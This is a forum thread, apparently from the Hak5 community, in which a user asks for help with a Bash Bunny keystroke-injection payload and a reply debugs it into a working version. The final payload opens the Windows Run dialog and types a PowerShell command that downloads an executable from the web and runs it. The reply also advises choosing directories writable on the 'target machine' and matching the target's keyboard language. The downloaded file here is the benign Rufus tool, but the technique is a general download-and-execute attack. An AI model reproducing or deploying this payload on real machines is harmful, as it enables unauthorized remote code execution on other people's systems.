Joe is having trouble with Bunny Script! Help

[Joeneedshelp1]

I cant seem to get the script i am working on to work.  I just want to have a script that will download a file from the internet.  However, the script I am using does not seem to work.  Am testing it on windows 10.  Here is the script. What is wrong?

LED SETUP
ATTACKMODE HID
LED STAGE1  
QUACK GUI r
QUACK DELAY 1000
QUACK STRING (New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Program Files\rufus-3.16.exe"); Start-Process -FilePath "C:\Program Files\rufus-3.16.exe"
QUACK ENTER
LED FINISH

 

 

[Rkiver]

Try the Bash Bunny section.

https://forums.hak5.org/forum/92-bash-bunny/

[Bob123]

You have too many """" in your string.  You may need to break it up a bit.

[dark_pyrro]

On 10/22/2021 at 2:38 AM, Joeneedshelp1 said:

I cant seem to get the script i am working on to work.  I just want to have a script that will download a file from the internet.  However, the script I am using does not seem to work.  Am testing it on windows 10.  Here is the script. What is wrong?

LED SETUP
ATTACKMODE HID
LED STAGE1  
QUACK GUI r
QUACK DELAY 1000
QUACK STRING (New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Program Files\rufus-3.16.exe"); Start-Process -FilePath "C:\Program Files\rufus-3.16.exe"
QUACK ENTER
LED FINISH

 

As said, this is probably not the correct part of the forum for this topic. But anyway, let's break this down.

Have you tried to run each "segment" of the script line by line on a Windows PC? This is most often "step 1" when trying to troubleshoot something that doesn't want to execute as intended in the format of a payload.

So, how successful are you running the following line in the Run dialog manually? My guess; not that successful at all.
 

(New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Program Files\rufus-3.16.exe"); Start-Process -FilePath "C:\Program Files\rufus-3.16.exe"

Why is that? First of all, Windows has no clue of what executable or command you are trying to run with a line starting with "(New-Object Net.Webclient).DownloadFile" since it's referring to .Net functionality, not a specific executable/binary.

Let's start with the download part first
(New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Program Files\rufus-3.16.exe")

First thing (depending on how you are going to use it, and in what environment, and with what privileges), I would most likely not put it directly in "Program Files" of the target machine. Chose something that is more likely to be writable on the local system without any need of touching/changing any permissions on the local system. Using C:\Tmp here just because I'm lazy, but in a real world scenario I would probably use some of the directories that normally have write permissions regardless of local user type.
(New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Tmp\rufus-3.16.exe")

Next thing is to clean the string up a bit, change the " surrounding the path to the download directory to '
(New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe')

To be even more "correct", we can throw in "System" into it all
(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe')

Now pull up the run dialog manually on a Windows system to verify it all manually
powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe')"

The above line should download the executable and put it in C:\Tmp

Also verify that it is possible to start the downloaded executable using PowerShell (this should be no problem), same thing here though, change " to ' that surrounds the path and file name to the executable.
powershell "Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'"

So, after changing the line/string to something that Windows understands, the next thing will be to append the file execution above to it all.
powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe'); Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'"

In a "format" ready for the Bunny payload, it should look like this
QUACK STRING powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe'); Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'"

Adding Read-Host to the end of the line to execute can be good if in need of seeing what output the PowerShell window generates; errors and such might be nice to be able to spot before the window closes
QUACK STRING powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe'); Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'; Read-Host"

Last but not least, language! Use the proper language of the target system (if non US) with DUCKY_LANG, otherwise some chars will be garbage when the payload is executed by the Bunny. Some chars might need to be escaped in the payload file as well, but you have to try that and see what's needed. It should work without escaping anything in this particular payload.

The final result looks like this (remember to change the DUCKY_LANG if used)

LED SETUP
DUCKY_LANG xx
ATTACKMODE HID
LED STAGE1  
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe'); Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'"
QUACK ENTER
LED FINISH